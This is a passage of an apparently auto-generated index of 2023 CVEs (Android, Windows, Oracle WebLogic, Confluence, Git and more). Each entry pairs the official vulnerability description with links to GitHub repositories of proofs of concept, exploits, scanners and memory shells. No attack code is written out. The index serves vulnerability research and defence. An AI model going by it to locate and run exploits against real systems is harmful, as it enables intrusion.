In BitmapExport.java, there is a possible failure to truncate images due to a logic error in the code. Product: Android. Versions: Android kernel. Android ID: A-264261868. References: N/A.

- [qixils/AntiCropalypse](https://github.com/qixils/AntiCropalypse)
- [infobyte/CVE-2023-21036](https://github.com/infobyte/CVE-2023-21036)
- [notaSWE/gocropalypse](https://github.com/notaSWE/gocropalypse)
- [lordofpipes/acropadetect](https://github.com/lordofpipes/acropadetect)

### CVE-2023-21086 (2023-04-19)

In isToggleable of SecureNfcEnabler.java and SecureNfcPreferenceController.java, there is a possible way to enable NFC from a secondary account due to a permissions bypass. This could lead to local escalation of privilege from the Guest account with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-12, Android-12L, Android-13. Android ID: A-238298970.

- [Trinadh465/packages_apps_Settings_CVE-2023-21086](https://github.com/Trinadh465/packages_apps_Settings_CVE-2023-21086)

### CVE-2023-21094 (2023-04-19)

In sanitize of LayerState.cpp, there is a possible way to take over the screen display and swap the display content due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-12, Android-12L, Android-13. Android ID: A-248031255.

- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094)

### CVE-2023-21097 (2023-04-19)

In toUriInner of Intent.java, there is a possible way to launch an arbitrary activity due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-12, Android-12L, Android-13. Android ID: A-261858325.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097)
- [uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097)

### CVE-2023-21109 (2023-05-15)

In multiple places of AccessibilityService, there is a possible way to hide the app from the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-12, Android-12L, Android-13. Android ID: A-261589597.

- [Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_](https://github.com/Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109)

### CVE-2023-21118 (2023-05-15)

In unflattenString8 of Sensor.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-12, Android-12L, Android-13. Android ID: A-269014004.

- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118)
- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118)

### CVE-2023-21144 (2023-06-15)

In doInBackground of NotificationContentInflater.java, there is a possible temporary denial of service due to long running operations. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-12, Android-12L, Android-13. Android ID: A-252766417.

- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old)
- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144)

### CVE-2023-21238 (2023-07-12)

In visitUris of RemoteViews.java, there is a possible leak of images between users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238)

### CVE-2023-21246 (2023-07-12)

In ShortcutInfo of ShortcutInfo.java, there is a possible way for an app to retain notification listening access due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246)

### CVE-2023-21251 (2023-07-12)

In onCreate of ConfirmDialog.java, there is a possible way to connect to a VPN bypassing the user's consent due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251)

### CVE-2023-21272 (2023-08-14)

In readFrom of Uri.java, there is a possible bad URI permission grant due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272](https://github.com/Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272)
- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272)

### CVE-2023-21275 (2023-08-14)

In decideCancelProvisioningDialog of AdminIntegratedFlowPrepareActivity.java, there is a possible way to bypass factory reset protections due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275](https://github.com/Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275)

### CVE-2023-21281 (2023-08-14)

In multiple functions of KeyguardViewMediator.java, there is a possible failure to lock after screen timeout due to a logic error in the code. This could lead to local escalation of privilege across users with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/platform_frameworks_base_CVE-2023-21281](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21281)

### CVE-2023-21282 (2023-08-14)

In TRANSPOSER_SETTINGS of lpp_tran.h, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.

- [Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282](https://github.com/Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282)
- [Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282](https://github.com/Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282)

### CVE-2023-21284 (2023-08-14)

In multiple functions of DevicePolicyManager.java, there is a possible way to prevent enabling the Find my Device feature due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284)

### CVE-2023-21285 (2023-08-14)

In setMetadata of MediaSessionRecord.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

- [uthrasri/framework_base_CVE-2023-21285_NoPatch](https://github.com/uthrasri/framework_base_CVE-2023-21285_NoPatch)

### CVE-2023-21286 (2023-08-14)

In visitUris of RemoteViews.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/platform_frameworks_base_CVE-2023-21286](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21286)

### CVE-2023-21288 (2023-08-14)

In visitUris of Notification.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/platform_frameworks_base_CVE-2023-21288](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21288)

### CVE-2023-21554 (2023-04-11)

Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability

- [zoemurmure/CVE-2023-21554-PoC](https://github.com/zoemurmure/CVE-2023-21554-PoC)
- [3tternp/CVE-2023-21554](https://github.com/3tternp/CVE-2023-21554)

### CVE-2023-21560 (2023-01-10)

Windows Boot Manager Security Feature Bypass Vulnerability

- [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk)

### CVE-2023-21608 (2023-01-18)

Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

- [hacksysteam/CVE-2023-21608](https://github.com/hacksysteam/CVE-2023-21608)
- [Malwareman007/CVE-2023-21608](https://github.com/Malwareman007/CVE-2023-21608)

### CVE-2023-21674 (2023-01-10)

Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability

- [hd3s5aa/CVE-2023-21674](https://github.com/hd3s5aa/CVE-2023-21674)

### CVE-2023-21707 (2023-02-14)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [N1k0la-T/CVE-2023-21707](https://github.com/N1k0la-T/CVE-2023-21707)

### CVE-2023-21716 (2023-02-14)

Microsoft Word Remote Code Execution Vulnerability

- [FeatherStark/CVE-2023-21716](https://github.com/FeatherStark/CVE-2023-21716)
- [Xnuvers007/CVE-2023-21716](https://github.com/Xnuvers007/CVE-2023-21716)
- [gyaansastra/CVE-2023-21716](https://github.com/gyaansastra/CVE-2023-21716)
- [mikesxrs/CVE-2023-21716_YARA_Results](https://github.com/mikesxrs/CVE-2023-21716_YARA_Results)
- [3yujw7njai/CVE-2023-21716-POC](https://github.com/3yujw7njai/CVE-2023-21716-POC)
- [hv0l/CVE-2023-21716_exploit](https://github.com/hv0l/CVE-2023-21716_exploit)
- [JMousqueton/CVE-2023-21716](https://github.com/JMousqueton/CVE-2023-21716)
- [Lord-of-the-IoT/CVE-2023-21716](https://github.com/Lord-of-the-IoT/CVE-2023-21716)
- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py)
- [n0s3ns33/poc-cve-2023-21716](https://github.com/n0s3ns33/poc-cve-2023-21716)

### CVE-2023-21739 (2023-01-10)

Windows Bluetooth Driver Elevation of Privilege Vulnerability

- [gmh5225/CVE-2023-21739](https://github.com/gmh5225/CVE-2023-21739)

### CVE-2023-21742 (2023-01-10)

Microsoft SharePoint Server Remote Code Execution Vulnerability

- [ohnonoyesyes/CVE-2023-21742](https://github.com/ohnonoyesyes/CVE-2023-21742)

### CVE-2023-21746 (2023-01-10)

Windows NTLM Elevation of Privilege Vulnerability

- [Muhammad-Ali007/LocalPotato_CVE-2023-21746](https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746)

### CVE-2023-21752 (2023-01-10)

Windows Backup Service Elevation of Privilege Vulnerability

- [Wh04m1001/CVE-2023-21752](https://github.com/Wh04m1001/CVE-2023-21752)
- [yosef0x01/CVE-2023-21752](https://github.com/yosef0x01/CVE-2023-21752)

### CVE-2023-21766 (2023-01-10)

Windows Overlay Filter Information Disclosure Vulnerability

- [Y3A/cve-2023-21766](https://github.com/Y3A/cve-2023-21766)

### CVE-2023-21768 (2023-01-10)

Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability

- [chompie1337/Windows_LPE_AFD_CVE-2023-21768](https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768)
- [cl4ym0re/cve-2023-21768-compiled](https://github.com/cl4ym0re/cve-2023-21768-compiled)
- [SamuelTulach/nullmap](https://github.com/SamuelTulach/nullmap)
- [Malwareman007/CVE-2023-21768](https://github.com/Malwareman007/CVE-2023-21768)
- [HKxiaoli/Windows_AFD_LPE_CVE-2023-21768](https://github.com/HKxiaoli/Windows_AFD_LPE_CVE-2023-21768)
- [3yujw7njai/CVE-2023-21768-POC](https://github.com/3yujw7njai/CVE-2023-21768-POC)
- [h1bAna/CVE-2023-21768](https://github.com/h1bAna/CVE-2023-21768)
- [zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit](https://github.com/zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit)
- [Rosayxy/Recreate-cve-2023-21768](https://github.com/Rosayxy/Recreate-cve-2023-21768)
- [ldrx30/CVE-2023-21768](https://github.com/ldrx30/CVE-2023-21768)
- [xboxoneresearch/CVE-2023-21768-dotnet](https://github.com/xboxoneresearch/CVE-2023-21768-dotnet)

### CVE-2023-21823 (2023-02-14)

Windows Graphics Component Remote Code Execution Vulnerability

- [Elizarfish/CVE-2023-21823](https://github.com/Elizarfish/CVE-2023-21823)

### CVE-2023-21837 (2023-01-17)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

- [hktalent/CVE-2023-21837](https://github.com/hktalent/CVE-2023-21837)

### CVE-2023-21839 (2023-01-17)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

- [DXask88MA/Weblogic-CVE-2023-21839](https://github.com/DXask88MA/Weblogic-CVE-2023-21839)
- [ASkyeye/CVE-2023-21839](https://github.com/ASkyeye/CVE-2023-21839)
- [Firebasky/CVE-2023-21839](https://github.com/Firebasky/CVE-2023-21839)
- [houqe/POC_CVE-2023-21839](https://github.com/houqe/POC_CVE-2023-21839)
- [kw3h4/CVE-2023-21839-metasploit-scanner](https://github.com/kw3h4/CVE-2023-21839-metasploit-scanner)
- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test)
- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931)

### CVE-2023-21887 (2023-01-17)

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: GIS). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

- [zwxxb/CVE-2023-21887](https://github.com/zwxxb/CVE-2023-21887)

### CVE-2023-21931 (2023-04-18)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

- [TimeSHU/weblogic_CVE-2023-21931_POC-EXP](https://github.com/TimeSHU/weblogic_CVE-2023-21931_POC-EXP)

### CVE-2023-21939 (2023-04-18)

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).

- [Y4Sec-Team/CVE-2023-21939](https://github.com/Y4Sec-Team/CVE-2023-21939)

### CVE-2023-21971 (2023-04-18)

Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.32 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors as well as unauthorized update, insert or delete access to some of MySQL Connectors accessible data and unauthorized read access to a subset of MySQL Connectors accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:H).

- [Avento/CVE-2023-21971_Analysis](https://github.com/Avento/CVE-2023-21971_Analysis)

### CVE-2023-21987 (2023-04-18)

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.44 and Prior to 7.0.8. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H).

- [chunzhennn/cve-2023-21987-poc](https://github.com/chunzhennn/cve-2023-21987-poc)

### CVE-2023-22074 (2023-10-17)

Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Supported versions that are affected are 19.3-19.20 and 21.3-21.11. Easily exploitable vulnerability allows high privileged attacker having Create Session, Select Any Dictionary privilege with network access via Oracle Net to compromise Oracle Database Sharding. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Database Sharding. CVSS 3.1 Base Score 2.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L).

- [emad-almousa/CVE-2023-22074](https://github.com/emad-almousa/CVE-2023-22074)

### CVE-2023-22098 (2023-10-17)

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.12. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: Only applicable to 7.0.x platform. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).

- [Diego-AltF4/CVE-2023-22098](https://github.com/Diego-AltF4/CVE-2023-22098)

### CVE-2023-22432 (2023-03-05)

Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.

- [aeyesec/CVE-2023-22432](https://github.com/aeyesec/CVE-2023-22432)

### CVE-2023-22490 (2023-02-14)

Git is a revision control system. Using a specially-crafted repository, Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone optimization even when using a non-local transport. Though Git will abort local clones whose source `$GIT_DIR/objects` directory contains symbolic links, the `objects` directory itself may still be a symbolic link. These two may be combined to include arbitrary files based on known paths on the victim's filesystem within the malicious repository's working copy, allowing for data exfiltration in a similar manner as CVE-2022-39253.

A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7 and v2.30.8. If upgrading is impractical, two short-term workarounds are available. Avoid cloning repositories from untrusted sources with `--recurse-submodules`. Instead, consider cloning repositories without recursively cloning their submodules, and instead run `git submodule update` at each layer. Before doing so, inspect each new `.gitmodules` file to ensure that it does not contain suspicious module URLs.

- [smash8tap/CVE-2023-22490_PoC](https://github.com/smash8tap/CVE-2023-22490_PoC)

### CVE-2023-22515 (2023-10-04)

Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances.

Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

- [ErikWynter/CVE-2023-22515-Scan](https://github.com/ErikWynter/CVE-2023-22515-Scan)
- [j3seer/CVE-2023-22515-POC](https://github.com/j3seer/CVE-2023-22515-POC)
- [Chocapikk/CVE-2023-22515](https://github.com/Chocapikk/CVE-2023-22515)
- [ad-calcium/CVE-2023-22515](https://github.com/ad-calcium/CVE-2023-22515)
- [kh4sh3i/CVE-2023-22515](https://github.com/kh4sh3i/CVE-2023-22515)
- [sincere9/CVE-2023-22515](https://github.com/sincere9/CVE-2023-22515)
- [Le1a/CVE-2023-22515](https://github.com/Le1a/CVE-2023-22515)
- [Vulnmachines/confluence-cve-2023-22515](https://github.com/Vulnmachines/confluence-cve-2023-22515)
- [iveresk/CVE-2023-22515](https://github.com/iveresk/CVE-2023-22515)
- [youcannotseemeagain/CVE-2023-22515_RCE](https://github.com/youcannotseemeagain/CVE-2023-22515_RCE)
- [DsaHen/cve-2023-22515-exp](https://github.com/DsaHen/cve-2023-22515-exp)
- [joaoviictorti/CVE-2023-22515](https://github.com/joaoviictorti/CVE-2023-22515)
- [C1ph3rX13/CVE-2023-22515](https://github.com/C1ph3rX13/CVE-2023-22515)
- [AIex-3/confluence-hack](https://github.com/AIex-3/confluence-hack)
- [LucasPDiniz/CVE-2023-22515](https://github.com/LucasPDiniz/CVE-2023-22515)
- [aaaademo/Confluence-EvilJar](https://github.com/aaaademo/Confluence-EvilJar)
- [edsonjt81/CVE-2023-22515-Scan.](https://github.com/edsonjt81/CVE-2023-22515-Scan.)
- [INTfinityConsulting/cve-2023-22515](https://github.com/INTfinityConsulting/cve-2023-22515)
- [CalegariMindSec/Exploit-CVE-2023-22515](https://github.com/CalegariMindSec/Exploit-CVE-2023-22515)
- [rxerium/CVE-2023-22515](https://github.com/rxerium/CVE-2023-22515)
- [fyx1t/NSE--CVE-2023-22515](https://github.com/fyx1t/NSE--CVE-2023-22515)
- [s1d6point7bugcrowd/CVE-2023-22515-check](https://github.com/s1d6point7bugcrowd/CVE-2023-22515-check)
- [xorbbo/cve-2023-22515](https://github.com/xorbbo/cve-2023-22515)
- [spareack/CVE-2023-22515-NSE](https://github.com/spareack/CVE-2023-22515-NSE)
- [Onedy1703/CVE-2023-22515](https://github.com/Onedy1703/CVE-2023-22515)

### CVE-2023-22518 (2023-10-31)

All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability.

Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

- [ForceFledgling/CVE-2023-22518](https://github.com/ForceFledgling/CVE-2023-22518)
- [davidfortytwo/CVE-2023-22518](https://github.com/davidfortytwo/CVE-2023-22518)
- [RevoltSecurities/CVE-2023-22518](https://github.com/RevoltSecurities/CVE-2023-22518)
- [0x0d3ad/CVE-2023-22518](https://github.com/0x0d3ad/CVE-2023-22518)
- [C1ph3rX13/CVE-2023-22518](https://github.com/C1ph3rX13/CVE-2023-22518)
- [bibo318/CVE-2023-22518](https://github.com/bibo318/CVE-2023-22518)
- [Lilly-dox/Exploit-CVE-2023-22518](https://github.com/Lilly-dox/Exploit-CVE-2023-22518)
- [zgimszhd61/CVE-2023-22518](https://github.com/zgimszhd61/CVE-2023-22518)

### CVE-2023-22524 (2023-12-06)

Certain versions of the Atlassian Companion App for MacOS were affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion’s blocklist and MacOS Gatekeeper to allow execution of code.

- [imperva/CVE-2023-22524](https://github.com/imperva/CVE-2023-22524)
- [ron-imperva/CVE-2023-22524](https://github.com/ron-imperva/CVE-2023-22524)

### CVE-2023-22527 (2024-01-16)

A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.

Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.

- [Avento/CVE-2023-22527_Confluence_RCE](https://github.com/Avento/CVE-2023-22527_Confluence_RCE)
- [Sudistark/patch-diff-CVE-2023-22527](https://github.com/Sudistark/patch-diff-CVE-2023-22527)
- [ga0we1/CVE-2023-22527_Confluence_RCE](https://github.com/ga0we1/CVE-2023-22527_Confluence_RCE)
- [Drun1baby/CVE-2023-22527](https://github.com/Drun1baby/CVE-2023-22527)
- [cleverg0d/CVE-2023-22527](https://github.com/cleverg0d/CVE-2023-22527)
- [thanhlam-attt/CVE-2023-22527](https://github.com/thanhlam-attt/CVE-2023-22527)
- [Manh130902/CVE-2023-22527-POC](https://github.com/Manh130902/CVE-2023-22527-POC)
- [VNCERT-CC/CVE-2023-22527-confluence](https://github.com/VNCERT-CC/CVE-2023-22527-confluence)
- [Vozec/CVE-2023-22527](https://github.com/Vozec/CVE-2023-22527)
- [C1ph3rX13/CVE-2023-22527](https://github.com/C1ph3rX13/CVE-2023-22527)
- [Niuwoo/CVE-2023-22527](https://github.com/Niuwoo/CVE-2023-22527)
- [Chocapikk/CVE-2023-22527](https://github.com/Chocapikk/CVE-2023-22527)
- [RevoltSecurities/CVE-2023-22527](https://github.com/RevoltSecurities/CVE-2023-22527)
- [yoryio/CVE-2023-22527](https://github.com/yoryio/CVE-2023-22527)
- [Privia-Security/CVE-2023-22527](https://github.com/Privia-Security/CVE-2023-22527)
- [MaanVader/CVE-2023-22527-POC](https://github.com/MaanVader/CVE-2023-22527-POC)
- [adminlove520/CVE-2023-22527](https://github.com/adminlove520/CVE-2023-22527)
- [YongYe-Security/CVE-2023-22527](https://github.com/YongYe-Security/CVE-2023-22527)
- [Boogipop/CVE-2023-22527-Godzilla-MEMSHELL](https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL)
- [M0untainShley/CVE-2023-22527-MEMSHELL](https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL)
- [vulncheck-oss/cve-2023-22527](https://github.com/vulncheck-oss/cve-2023-22527)
- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE)
- [kh4sh3i/CVE-2023-22527](https://github.com/kh4sh3i/CVE-2023-22527)
- [AxthonyV/CVE-2023-22527](https://github.com/AxthonyV/CVE-2023-22527)

### CVE-2023-22551 (2023-01-01)

The FTP (aka "Implementation of a simple FTP client and server") project through 96c1a35 allows remote attackers to cause a denial of service (memory consumption) by engaging in client activity, such as establishing and then terminating a connection. This occurs because malloc is used but free is not.

- [viswagb/CVE-2023-22551](https://github.com/viswagb/CVE-2023-22551)

### CVE-2023-22621 (2023-04-19)

Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses the validation checks that should prevent code execution.

- [sofianeelhor/CVE-2023-22621-POC](https://github.com/sofianeelhor/CVE-2023-22621-POC)

### CVE-2023-22622 (2023-01-05)

WordPress through 6.1.1 depends on unpredictable client visits to cause wp-cron.php execution and the resulting security updates, and the source code describes "the scenario where a site may not receive enough visits to execute scheduled tasks in a timely manner," but neither the installation guide nor the security guide mentions this default behavior, or alerts the user about security risks on installations with very few visits.

- [michael-david-fry/CVE-2023-22622](https://github.com/michael-david-fry/CVE-2023-22622)

### CVE-2023-22726 (2023-01-20)

act is a project which allows for local running of GitHub Actions. The artifact server that stores artifacts from GitHub Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a GitHub Action. This issue may lead to privilege escalation. The /upload endpoint is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open. The /artifact endpoint is vulnerable to path traversal as the path variable is user controlled, and the specified file is ultimately returned by the server. This has been addressed in version 0.2.40. Users are advised to upgrade. Users unable to upgrade may, during implementation of Open and OpenAtEnd for FS, ensure to use ValidPath() to check against path traversal or clean the user-provided paths manually.

- [ProxyPog/POC-CVE-2023-22726](https://github.com/ProxyPog/POC-CVE-2023-22726)

### CVE-2023-22809 (2023-01-18)

